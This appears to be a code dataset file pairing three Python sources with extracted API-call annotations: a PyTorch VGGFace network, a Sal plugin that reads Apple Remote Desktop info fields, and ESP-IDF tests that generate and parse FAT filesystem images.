transform_list = [transforms.Resize(256),]
if jitter:
transform_list.append(transforms.RandomCrop((224,224)))
transform_list.append(transforms.RandomHorizontalFlip())
#transform_list.append(transforms.ColorJitter(brightness=0.1, contrast=0.1, saturation=0.1, hue=0.1))
else:
transform_list.append(transforms.CenterCrop((224,224)))
if blur_radius is not None and blur_prob > 0:
transform_list.append(transforms.Lambda(generate_random_blur(blur_radius, blur_prob)))
# finally, convert PIL RGB image to FloatTensor
transform_list.append(transforms.Lambda(prepare_vggface_image))
return transforms.Compose(transform_list)
class VGGFace(nn.Module):
    """
    The VGGFace network (VGG_VD_16).

    mode can be one of ['encode', 'classify', 'both']:
      * 'encode'   - forward() returns the fc7 encoding
      * 'classify' - forward() returns the fc8 logits
      * 'both'     - forward() returns (fc7 encoding, fc8 logits)
    """
    def __init__(self, mode='encode', num_classes=2622):
        """Build the VGG-16 layer stack.

        :param mode: output selection, one of 'encode', 'classify', 'both'
        :param num_classes: number of outputs of the fc8 classification head
        :raises Exception: if mode is not one of the valid modes
        """
        super(VGGFace, self).__init__()
        valid_modes = {'encode', 'classify', 'both'}
        if mode not in valid_modes:
            raise Exception('mode should be one of ' + str(valid_modes))

        self.mode = mode
        self.fc_outputs = num_classes

        # layers with stored weights
        self.conv1_1 = nn.Conv2d(3, 64, (3, 3), (1, 1), (1, 1))
        self.conv1_2 = nn.Conv2d(64, 64, (3, 3), (1, 1), (1, 1))
        self.conv2_1 = nn.Conv2d(64, 128, (3, 3), (1, 1), (1, 1))
        self.conv2_2 = nn.Conv2d(128, 128, (3, 3), (1, 1), (1, 1))
        self.conv3_1 = nn.Conv2d(128, 256, (3, 3), (1, 1), (1, 1))
        self.conv3_2 = nn.Conv2d(256, 256, (3, 3), (1, 1), (1, 1))
        self.conv3_3 = nn.Conv2d(256, 256, (3, 3), (1, 1), (1, 1))
        self.conv4_1 = nn.Conv2d(256, 512, (3, 3), (1, 1), (1, 1))
        self.conv4_2 = nn.Conv2d(512, 512, (3, 3), (1, 1), (1, 1))
        self.conv4_3 = nn.Conv2d(512, 512, (3, 3), (1, 1), (1, 1))
        self.conv5_1 = nn.Conv2d(512, 512, (3, 3), (1, 1), (1, 1))
        self.conv5_2 = nn.Conv2d(512, 512, (3, 3), (1, 1), (1, 1))
        self.conv5_3 = nn.Conv2d(512, 512, (3, 3), (1, 1), (1, 1))
        self.fc6 = nn.Linear(25088, 4096)
        self.fc7 = nn.Linear(4096, 4096)
        self.fc8 = nn.Linear(4096, self.fc_outputs)

        # layers with no weights
        self.nonlin = nn.ReLU()
        self.maxpool = nn.MaxPool2d((2, 2), (2, 2), (0, 0), ceil_mode=True)
        self.dropout = nn.Dropout(0.5)

    def forward(self, input):
        """
        Run the network.
        Input should be Nx3x224x224.
        Based on self.mode, return output of fc7, fc8, or both.
        """
        assert len(input.size()) == 4

        e1_1 = self.nonlin(self.conv1_1(input))
        e1_2 = self.maxpool(self.nonlin(self.conv1_2(e1_1)))
        e2_1 = self.nonlin(self.conv2_1(e1_2))
        e2_2 = self.maxpool(self.nonlin(self.conv2_2(e2_1)))
        e3_1 = self.nonlin(self.conv3_1(e2_2))
        e3_2 = self.nonlin(self.conv3_2(e3_1))
        e3_3 = self.maxpool(self.nonlin(self.conv3_3(e3_2)))
        e4_1 = self.nonlin(self.conv4_1(e3_3))
        e4_2 = self.nonlin(self.conv4_2(e4_1))
        e4_3 = self.maxpool(self.nonlin(self.conv4_3(e4_2)))
        e5_1 = self.nonlin(self.conv5_1(e4_3))
        e5_2 = self.nonlin(self.conv5_2(e5_1))
        e5_3 = self.maxpool(self.nonlin(self.conv5_3(e5_2)))

        e5_3_flat = e5_3.view(e5_3.size(0), -1)
        e6 = self.nonlin(self.fc6(e5_3_flat))

        # use encoding prior to nonlinearity
        e7_pre = self.fc7(self.dropout(e6))
        e7 = self.nonlin(e7_pre)

        # return e7, e8, or both depending on self.mode
        if self.mode == 'encode':
            return e7
        else:
            e8 = self.fc8(self.dropout(e7))
            if self.mode == 'classify':
                return e8
            elif self.mode == 'both':
                return e7, e8
            else:
                # BUG FIX: previously referenced the undefined local name 'mode'
                # (a NameError); report the actual invalid value instead.
                raise Exception('Invalid mode: ' + self.mode)

    def set_fc_outputs(self, new_fc_outputs):
        """Replace the fc8 classification head so it emits new_fc_outputs classes."""
        self.fc_outputs = new_fc_outputs
        self.fc8 = nn.Linear(4096, self.fc_outputs)
class VGGFace_Custom(VGGFace):
    """VGGFace variant whose forward pass returns the fc7 encoding, optionally
    L2-normalised; the classification head is never evaluated."""

    def forward(self, input, nrm=True):
        """
        Run the network on an Nx3x224x224 batch and return the fc7 encoding.
        When *nrm* is True the encoding is L2-normalised along dim 1.
        """
        assert len(input.size()) == 4

        # Convolutional trunk: five blocks of conv+ReLU with a max-pool at the
        # end of each block.
        x = self.maxpool(self.nonlin(self.conv1_2(self.nonlin(self.conv1_1(input)))))
        x = self.maxpool(self.nonlin(self.conv2_2(self.nonlin(self.conv2_1(x)))))
        x = self.nonlin(self.conv3_1(x))
        x = self.nonlin(self.conv3_2(x))
        x = self.maxpool(self.nonlin(self.conv3_3(x)))
        x = self.nonlin(self.conv4_1(x))
        x = self.nonlin(self.conv4_2(x))
        x = self.maxpool(self.nonlin(self.conv4_3(x)))
        x = self.nonlin(self.conv5_1(x))
        x = self.nonlin(self.conv5_2(x))
        x = self.maxpool(self.nonlin(self.conv5_3(x)))

        # Fully-connected head up to fc7; the encoding is taken after the
        # fc7 nonlinearity (dropout is applied before fc7, as in the parent).
        flat = x.view(x.size(0), -1)
        hidden = self.nonlin(self.fc6(flat))
        encoding = self.nonlin(self.fc7(self.dropout(hidden)))

        if nrm is False:
            return encoding
        return F.normalize(encoding, p=2, dim=1)
def vgg16(model_filename=None):
    """
    Construct a VGG-16 face model.

    When *model_filename* is given, the model weights are loaded from that file.
    """
    net = VGGFace_Custom()
    if model_filename is None:
        return net
    net.load_state_dict(torch.load(model_filename))
    return net
| [
"torchvision.transforms.CenterCrop",
"torch.nn.ReLU",
"torch.nn.Dropout",
"numpy.random.random",
"torch.load",
"numpy.rollaxis",
"torchvision.transforms.Lambda",
"torch.from_numpy",
"torch.nn.Conv2d",
"torch.nn.functional.normalize",
"numpy.array",
"torchvision.transforms.RandomCrop",
"torch... | [((730, 759), 'numpy.rollaxis', 'np.rollaxis', (['img_bgr_fp', '(2)', '(0)'], {}), '(img_bgr_fp, 2, 0)\n', (741, 759), True, 'import numpy as np\n'), ((1862, 1896), 'torchvision.transforms.Compose', 'transforms.Compose', (['transform_list'], {}), '(transform_list)\n', (1880, 1896), True, 'import torchvision.transforms as transforms\n'), ((543, 556), 'numpy.array', 'np.array', (['img'], {}), '(img)\n', (551, 556), True, 'import numpy as np\n'), ((629, 667), 'numpy.array', 'np.array', (['(93.594, 104.7624, 129.1863)'], {}), '((93.594, 104.7624, 129.1863))\n', (637, 667), True, 'import numpy as np\n'), ((1233, 1255), 'torchvision.transforms.Resize', 'transforms.Resize', (['(256)'], {}), '(256)\n', (1250, 1255), True, 'import torchvision.transforms as transforms\n'), ((1809, 1849), 'torchvision.transforms.Lambda', 'transforms.Lambda', (['prepare_vggface_image'], {}), '(prepare_vggface_image)\n', (1826, 1849), True, 'import torchvision.transforms as transforms\n'), ((2411, 2451), 'torch.nn.Conv2d', 'nn.Conv2d', (['(3)', '(64)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(3, 64, (3, 3), (1, 1), (1, 1))\n', (2420, 2451), True, 'import torch.nn as nn\n'), ((2471, 2512), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(64)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(64, 64, (3, 3), (1, 1), (1, 1))\n', (2480, 2512), True, 'import torch.nn as nn\n'), ((2533, 2575), 'torch.nn.Conv2d', 'nn.Conv2d', (['(64)', '(128)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(64, 128, (3, 3), (1, 1), (1, 1))\n', (2542, 2575), True, 'import torch.nn as nn\n'), ((2595, 2638), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(128)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(128, 128, (3, 3), (1, 1), (1, 1))\n', (2604, 2638), True, 'import torch.nn as nn\n'), ((2659, 2702), 'torch.nn.Conv2d', 'nn.Conv2d', (['(128)', '(256)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(128, 256, (3, 3), (1, 1), (1, 1))\n', (2668, 2702), True, 'import torch.nn as nn\n'), ((2722, 2765), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', 
'(3, 3)', '(1, 1)', '(1, 1)'], {}), '(256, 256, (3, 3), (1, 1), (1, 1))\n', (2731, 2765), True, 'import torch.nn as nn\n'), ((2785, 2828), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(256)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(256, 256, (3, 3), (1, 1), (1, 1))\n', (2794, 2828), True, 'import torch.nn as nn\n'), ((2849, 2892), 'torch.nn.Conv2d', 'nn.Conv2d', (['(256)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(256, 512, (3, 3), (1, 1), (1, 1))\n', (2858, 2892), True, 'import torch.nn as nn\n'), ((2912, 2955), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (2921, 2955), True, 'import torch.nn as nn\n'), ((2975, 3018), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (2984, 3018), True, 'import torch.nn as nn\n'), ((3039, 3082), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (3048, 3082), True, 'import torch.nn as nn\n'), ((3102, 3145), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (3111, 3145), True, 'import torch.nn as nn\n'), ((3165, 3208), 'torch.nn.Conv2d', 'nn.Conv2d', (['(512)', '(512)', '(3, 3)', '(1, 1)', '(1, 1)'], {}), '(512, 512, (3, 3), (1, 1), (1, 1))\n', (3174, 3208), True, 'import torch.nn as nn\n'), ((3225, 3247), 'torch.nn.Linear', 'nn.Linear', (['(25088)', '(4096)'], {}), '(25088, 4096)\n', (3234, 3247), True, 'import torch.nn as nn\n'), ((3266, 3287), 'torch.nn.Linear', 'nn.Linear', (['(4096)', '(4096)'], {}), '(4096, 4096)\n', (3275, 3287), True, 'import torch.nn as nn\n'), ((3306, 3338), 'torch.nn.Linear', 'nn.Linear', (['(4096)', 'self.fc_outputs'], {}), '(4096, self.fc_outputs)\n', (3315, 3338), True, 'import torch.nn as nn\n'), ((3395, 3404), 'torch.nn.ReLU', 'nn.ReLU', ([], {}), '()\n', (3402, 3404), True, 'import 
torch.nn as nn\n'), ((3428, 3480), 'torch.nn.MaxPool2d', 'nn.MaxPool2d', (['(2, 2)', '(2, 2)', '(0, 0)'], {'ceil_mode': '(True)'}), '((2, 2), (2, 2), (0, 0), ceil_mode=True)\n', (3440, 3480), True, 'import torch.nn as nn\n'), ((3501, 3516), 'torch.nn.Dropout', 'nn.Dropout', (['(0.5)'], {}), '(0.5)\n', (3511, 3516), True, 'import torch.nn as nn\n'), ((5128, 5160), 'torch.nn.Linear', 'nn.Linear', (['(4096)', 'self.fc_outputs'], {}), '(4096, self.fc_outputs)\n', (5137, 5160), True, 'import torch.nn as nn\n'), ((6725, 6752), 'torch.nn.functional.normalize', 'F.normalize', (['e7'], {'p': '(2)', 'dim': '(1)'}), '(e7, p=2, dim=1)\n', (6736, 6752), True, 'import torch.nn.functional as F\n'), ((771, 799), 'torch.from_numpy', 'torch.from_numpy', (['img_bgr_fp'], {}), '(img_bgr_fp)\n', (787, 799), False, 'import torch\n'), ((897, 915), 'numpy.random.random', 'np.random.random', ([], {}), '()\n', (913, 915), True, 'import numpy as np\n'), ((1303, 1336), 'torchvision.transforms.RandomCrop', 'transforms.RandomCrop', (['(224, 224)'], {}), '((224, 224))\n', (1324, 1336), True, 'import torchvision.transforms as transforms\n'), ((1367, 1400), 'torchvision.transforms.RandomHorizontalFlip', 'transforms.RandomHorizontalFlip', ([], {}), '()\n', (1398, 1400), True, 'import torchvision.transforms as transforms\n'), ((1552, 1585), 'torchvision.transforms.CenterCrop', 'transforms.CenterCrop', (['(224, 224)'], {}), '((224, 224))\n', (1573, 1585), True, 'import torchvision.transforms as transforms\n'), ((7002, 7028), 'torch.load', 'torch.load', (['model_filename'], {}), '(model_filename)\n', (7012, 7028), False, 'import torch\n'), ((959, 1003), 'PIL.ImageFilter.GaussianBlur', 'ImageFilter.GaussianBlur', ([], {'radius': 'blur_radius'}), '(radius=blur_radius)\n', (983, 1003), False, 'from PIL import ImageFilter\n')] |
#!/usr/bin/python
import os
import sys
sys.path.append("/usr/local/munki/munkilib")
import FoundationPlist
RESULTS_PATH = "/usr/local/sal/plugin_results.plist"
def main():
    """Collect the four ARD (Apple Remote Desktop) computer-info fields and
    append them to Sal's plugin results plist.

    Reads Text1..Text4 from the ARD preferences (empty string when absent or
    when the preferences file does not exist) and writes an 'ARD_Info' record
    to RESULTS_PATH, preserving any results already stored there.
    """
    ard_path = "/Library/Preferences/com.apple.RemoteDesktop.plist"
    if os.path.exists(ard_path):
        ard_prefs = FoundationPlist.readPlist(ard_path)
    else:
        ard_prefs = {}

    sal_result_key = "ARD_Info_{}"
    prefs_key_prefix = "Text{}"

    # ARD stores the free-form info fields under keys Text1..Text4.
    # BUG FIX: 'xrange' only exists on Python 2; 'range' works on both 2 and 3.
    data = {
        sal_result_key.format(i): ard_prefs.get(prefs_key_prefix.format(i), "")
        for i in range(1, 5)}

    formatted_results = {
        "plugin": "ARD_Info",
        "historical": False,
        "data": data}

    # Append to any existing plugin results rather than clobbering them.
    if os.path.exists(RESULTS_PATH):
        plugin_results = FoundationPlist.readPlist(RESULTS_PATH)
    else:
        plugin_results = []

    plugin_results.append(formatted_results)
    FoundationPlist.writePlist(plugin_results, RESULTS_PATH)


if __name__ == "__main__":
    main()
"os.path.exists",
"FoundationPlist.readPlist",
"sys.path.append",
"FoundationPlist.writePlist"
] | [((42, 86), 'sys.path.append', 'sys.path.append', (['"""/usr/local/munki/munkilib"""'], {}), "('/usr/local/munki/munkilib')\n", (57, 86), False, 'import sys\n'), ((254, 278), 'os.path.exists', 'os.path.exists', (['ard_path'], {}), '(ard_path)\n', (268, 278), False, 'import os\n'), ((679, 707), 'os.path.exists', 'os.path.exists', (['RESULTS_PATH'], {}), '(RESULTS_PATH)\n', (693, 707), False, 'import os\n'), ((863, 919), 'FoundationPlist.writePlist', 'FoundationPlist.writePlist', (['plugin_results', 'RESULTS_PATH'], {}), '(plugin_results, RESULTS_PATH)\n', (889, 919), False, 'import FoundationPlist\n'), ((300, 335), 'FoundationPlist.readPlist', 'FoundationPlist.readPlist', (['ard_path'], {}), '(ard_path)\n', (325, 335), False, 'import FoundationPlist\n'), ((734, 773), 'FoundationPlist.readPlist', 'FoundationPlist.readPlist', (['RESULTS_PATH'], {}), '(RESULTS_PATH)\n', (759, 773), False, 'import FoundationPlist\n')] |
#!/usr/bin/env python
# SPDX-FileCopyrightText: 2021-2022 Espressif Systems (Shanghai) CO LTD
# SPDX-License-Identifier: Apache-2.0
import os
import shutil
import sys
import unittest
from subprocess import STDOUT, run
from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
import fatfsgen # noqa E402 # pylint: disable=C0413
class FatFSGen(unittest.TestCase):
    """End-to-end tests for fatfsgen.py / fatfsparse.py.

    Each test builds a FAT filesystem image (either via the fatfsgen Python
    API or by running fatfsgen.py as a subprocess), parses it back with
    fatfsparse.py (which extracts the image into an 'Espressif' directory),
    and asserts the extracted tree matches what was written.
    """
    def setUp(self) -> None:
        """Create the scratch 'output_data' directory and populate test fixtures."""
        os.makedirs('output_data')
        generate_test_dir_2()
    def tearDown(self) -> None:
        """Remove every directory/image a test may have produced."""
        shutil.rmtree('output_data', ignore_errors=True)
        shutil.rmtree('Espressif', ignore_errors=True)
        shutil.rmtree('testf', ignore_errors=True)
        if os.path.exists('fatfs_image.img'):
            os.remove('fatfs_image.img')
    @staticmethod
    def test_gen_parse() -> None:
        """Generate an image from the fixture tree and verify the parsed contents."""
        # fatfsgen.py is invoked twice: once via an absolute path relative to
        # this file, once via a relative path.
        run([
            'python',
            f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
            'output_data/tst_str'
        ], stderr=STDOUT)
        run(['python', '../fatfsgen.py', 'output_data/tst_str'], stderr=STDOUT)
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert set(os.listdir('Espressif')) == {'TEST', 'TESTFILE'}
        with open('Espressif/TESTFILE', 'rb') as in_:
            assert in_.read() == b'ahoj\n'
        assert set(os.listdir('Espressif/TEST')) == {'TEST', 'TESTFIL2'}
        with open('Espressif/TEST/TESTFIL2', 'rb') as in_:
            assert in_.read() == b'thisistest\n'
        assert set(os.listdir('Espressif/TEST/TEST')) == {'LASTFILE.TXT'}
        with open('Espressif/TEST/TEST/LASTFILE.TXT', 'rb') as in_:
            assert in_.read() == b'deeptest\n'
    @staticmethod
    def test_file_chaining() -> None:
        """A file one byte larger than a sector must chain across clusters."""
        fatfs = fatfsgen.FATFS()
        fatfs.create_file('WRITEF', extension='TXT')
        fatfs.write_content(path_from_root=['WRITEF.TXT'], content=4096 * b'a' + b'a')
        fatfs.write_filesystem('fatfs_image.img')
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        with open('Espressif/WRITEF.TXT', 'rb') as in_:
            assert in_.read() == 4097 * b'a'
    @staticmethod
    def test_full_two_sectors_folder() -> None:
        """A directory with enough entries (32 bytes each) to fill two sectors."""
        fatfs = fatfsgen.FATFS(size=2 * 1024 * 1024)
        fatfs.create_directory('TESTFOLD')
        for i in range((2 * 4096) // 32):
            fatfs.create_file(f'A{str(i).upper()}', path_from_root=['TESTFOLD'])
        fatfs.write_content(path_from_root=['TESTFOLD', 'A253'], content=b'later')
        fatfs.write_content(path_from_root=['TESTFOLD', 'A255'], content=b'last')
        fatfs.write_filesystem('fatfs_image.img')
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert set(os.listdir('Espressif')) == {'TESTFOLD'}
        assert set(os.listdir('Espressif/TESTFOLD')) == {f'A{str(i).upper()}' for i in range(256)}
        with open('Espressif/TESTFOLD/A253', 'rb') as in_:
            assert in_.read() == b'later'
        with open('Espressif/TESTFOLD/A255', 'rb') as in_:
            assert in_.read() == b'last'
    @staticmethod
    def test_empty_fat16() -> None:
        """A 17 MiB image selects FAT16; an empty one must still parse cleanly."""
        fatfs = fatfsgen.FATFS(size=17 * 1024 * 1024)
        fatfs.write_filesystem('fatfs_image.img')
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
    @staticmethod
    def test_chaining_fat16() -> None:
        """Cluster chaining for a >1-sector file on a FAT16 image."""
        fatfs = fatfsgen.FATFS(size=17 * 1024 * 1024)
        fatfs.create_file('WRITEF', extension='TXT')
        fatfs.write_content(path_from_root=['WRITEF.TXT'], content=4096 * b'a' + b'a')
        fatfs.write_filesystem('fatfs_image.img')
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        with open('Espressif/WRITEF.TXT', 'rb') as in_:
            assert in_.read() == 4097 * b'a'
    @staticmethod
    def test_full_sector_folder_fat16() -> None:
        """A directory sector filled to capacity on a FAT16 image."""
        fatfs = fatfsgen.FATFS(size=17 * 1024 * 1024)
        fatfs.create_directory('TESTFOLD')
        fill_sector(fatfs)
        fatfs.write_content(path_from_root=['TESTFOLD', 'A0'], content=b'first')
        fatfs.write_content(path_from_root=['TESTFOLD', 'A126'], content=b'later')
        fatfs.write_filesystem('fatfs_image.img')
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert set(os.listdir('Espressif')) == {'TESTFOLD'}
        assert set(os.listdir('Espressif/TESTFOLD')) == {f'A{str(i).upper()}' for i in range(128)}
        with open('Espressif/TESTFOLD/A0', 'rb') as in_:
            assert in_.read() == b'first'
        with open('Espressif/TESTFOLD/A126', 'rb') as in_:
            assert in_.read() == b'later'
    @staticmethod
    def file_(x: str, content_: str = 'hey this is a test') -> dict:
        """Build a file node for generate_local_folder_structure()."""
        return {
            'type': 'file',
            'name': x,
            'content': content_
        }
    def test_e2e_file(self) -> None:
        """End-to-end: one folder with one file, round-tripped through gen+parse."""
        struct_: dict = {
            'type': 'folder',
            'name': 'testf',
            'content': [self.file_('NEWF')]
        }
        generate_local_folder_structure(struct_, path_='.')
        run([
            'python',
            f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
            'testf'
        ], stderr=STDOUT)
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert compare_folders('testf', 'Espressif')
    def test_e2e_deeper(self) -> None:
        """End-to-end: a nested folder containing several small files."""
        folder_ = {
            'type': 'folder',
            'name': 'XYZ',
            'content': [
                self.file_('NEWFLE'),
                self.file_('NEW.TXT'),
                self.file_('NEWE.TXT'),
                self.file_('NEW4.TXT'),
                self.file_('NEW5.TXT'),
            ]
        }
        struct_: dict = {
            'type': 'folder',
            'name': 'testf',
            'content': [
                self.file_('MY_NEW'),
                folder_
            ]
        }
        generate_local_folder_structure(struct_, path_='.')
        run([
            'python',
            f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
            'testf'
        ], stderr=STDOUT)
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert compare_folders('testf', 'Espressif')
    def test_e2e_deeper_large(self) -> None:
        """End-to-end: multiple folders, multi-cluster files and 50 small files."""
        folder_ = {
            'type': 'folder',
            'name': 'XYZ',
            'content': [
                self.file_('NEWFLE', content_=4097 * 'a'),
                self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
                self.file_('NEWE.TXT'),
                self.file_('NEW4.TXT'),
                self.file_('NEW5.TXT'),
            ]
        }
        folder2_ = {
            'type': 'folder',
            'name': 'XYZ3',
            'content': [
                self.file_('NEWFLE', content_=4097 * 'a'),
                self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
                self.file_('NEWE.TXT'),
                self.file_('NEW4.TXT'),
                self.file_('NEW5.TXT'),
            ]
        }
        folder3_ = {
            'type': 'folder',
            'name': 'XYZ2',
            'content': [self.file_(f'A{i}') for i in range(50)]
        }
        struct_: dict = {
            'type': 'folder',
            'name': 'testf',
            'content': [
                self.file_('MY_NEW'),
                folder_,
                folder2_,
                folder3_
            ]
        }
        generate_local_folder_structure(struct_, path_='.')
        run([
            'python',
            f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
            'testf'
        ], stderr=STDOUT)
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert compare_folders('testf', 'Espressif')
    def test_e2e_very_deep(self) -> None:
        """End-to-end: folders nested inside folders, several levels deep."""
        folder_ = {
            'type': 'folder',
            'name': 'XYZ',
            'content': [
                self.file_('NEWFLE', content_=4097 * 'a'),
                self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
                self.file_('NEWE.TXT'),
                self.file_('NEW4.TXT'),
                self.file_('NEW5.TXT'),
            ]
        }
        folder2_ = {
            'type': 'folder',
            'name': 'XYZ3',
            'content': [
                self.file_('NEWFLE', content_=4097 * 'a'),
                self.file_('NEW.TXT', content_=2 * 4097 * 'a'),
                self.file_('NEWE.TXT'),
                self.file_('NEW4.TXT'),
                self.file_('NEW5.TXT'),
                folder_,
            ]
        }
        folder3_ = {
            'type': 'folder',
            'name': 'XYZ2',
            'content': [self.file_(f'A{i}') for i in range(50)] + [folder2_]
        }
        struct_: dict = {
            'type': 'folder',
            'name': 'testf',
            'content': [
                self.file_('MY_NEW'),
                folder_,
                folder2_,
                folder3_
            ]
        }
        generate_local_folder_structure(struct_, path_='.')
        run([
            'python',
            f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
            'testf'
        ], stderr=STDOUT)
        run(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)
        assert compare_folders('testf', 'Espressif')
    def test_e2e_very_deep_long(self) -> None:
        """End-to-end with long file names; requires --long_name_support on both tools."""
        folder_ = {
            'type': 'folder',
            'name': 'veryveryverylong111',
            'content': [
                self.file_('myndewveryverylongfile1.txt', content_=4097 * 'a'),
                self.file_('mynewveryverylongfile22.txt', content_=2 * 4097 * 'a'),
                self.file_('mynewveryverylongfile333.txt' * 8),
                self.file_('mynewveryverylongfile4444.txt' * 8),
                self.file_('mynewveryverylongfile5555.txt'),
                self.file_('SHORT.TXT'),
            ]
        }
        struct_: dict = {
            'type': 'folder',
            'name': 'testf',
            'content': [
                self.file_('mynewveryverylongfile.txt' * 5),
                folder_,
            ]
        }
        generate_local_folder_structure(struct_, path_='.')
        run([
            'python',
            f'{os.path.join(os.path.dirname(__file__), "..", "fatfsgen.py")}',
            'testf', '--long_name_support'
        ], stderr=STDOUT)
        run(['python', '../fatfsparse.py', 'fatfs_image.img', '--long-name-support'], stderr=STDOUT)
        assert compare_folders('testf', 'Espressif')
# Run the whole suite when the file is executed directly.
if __name__ == '__main__':
    unittest.main()
| [
"os.path.exists",
"fatfsgen.FATFS",
"test_utils.compare_folders",
"os.listdir",
"os.makedirs",
"subprocess.run",
"test_utils.generate_test_dir_2",
"test_utils.fill_sector",
"os.path.dirname",
"test_utils.generate_local_folder_structure",
"shutil.rmtree",
"unittest.main",
"os.remove"
] | [((10738, 10753), 'unittest.main', 'unittest.main', ([], {}), '()\n', (10751, 10753), False, 'import unittest\n'), ((356, 381), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (371, 381), False, 'import os\n'), ((518, 544), 'os.makedirs', 'os.makedirs', (['"""output_data"""'], {}), "('output_data')\n", (529, 544), False, 'import os\n'), ((553, 574), 'test_utils.generate_test_dir_2', 'generate_test_dir_2', ([], {}), '()\n', (572, 574), False, 'from test_utils import compare_folders, fill_sector, generate_local_folder_structure, generate_test_dir_2\n'), ((616, 664), 'shutil.rmtree', 'shutil.rmtree', (['"""output_data"""'], {'ignore_errors': '(True)'}), "('output_data', ignore_errors=True)\n", (629, 664), False, 'import shutil\n'), ((673, 719), 'shutil.rmtree', 'shutil.rmtree', (['"""Espressif"""'], {'ignore_errors': '(True)'}), "('Espressif', ignore_errors=True)\n", (686, 719), False, 'import shutil\n'), ((728, 770), 'shutil.rmtree', 'shutil.rmtree', (['"""testf"""'], {'ignore_errors': '(True)'}), "('testf', ignore_errors=True)\n", (741, 770), False, 'import shutil\n'), ((783, 816), 'os.path.exists', 'os.path.exists', (['"""fatfs_image.img"""'], {}), "('fatfs_image.img')\n", (797, 816), False, 'import os\n'), ((1096, 1167), 'subprocess.run', 'run', (["['python', '../fatfsgen.py', 'output_data/tst_str']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsgen.py', 'output_data/tst_str'], stderr=STDOUT)\n", (1099, 1167), False, 'from subprocess import STDOUT, run\n'), ((1176, 1245), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (1179, 1245), False, 'from subprocess import STDOUT, run\n'), ((1857, 1873), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {}), '()\n', (1871, 1873), False, 'import fatfsgen\n'), ((2073, 2142), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), 
"(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (2076, 2142), False, 'from subprocess import STDOUT, run\n'), ((2327, 2363), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(2 * 1024 * 1024)'}), '(size=2 * 1024 * 1024)\n', (2341, 2363), False, 'import fatfsgen\n'), ((2755, 2824), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (2758, 2824), False, 'from subprocess import STDOUT, run\n'), ((3258, 3295), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(17 * 1024 * 1024)'}), '(size=17 * 1024 * 1024)\n', (3272, 3295), False, 'import fatfsgen\n'), ((3354, 3423), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (3357, 3423), False, 'from subprocess import STDOUT, run\n'), ((3498, 3535), 'fatfsgen.FATFS', 'fatfsgen.FATFS', ([], {'size': '(17 * 1024 * 1024)'}), '(size=17 * 1024 * 1024)\n', (3512, 3535), False, 'import fatfsgen\n'), ((3734, 3803), 'subprocess.run', 'run', (["['python', '../fatfsparse.py', 'fatfs_image.img']"], {'stderr': 'STDOUT'}), "(['python', '../fatfsparse.py', 'fatfs_image.img'], stderr=STDOUT)\n", (3737, 3803), False, 'from subprocess import STDOUT, run\n'), ((3989, 4026), 'fatfsgen.FATFS', 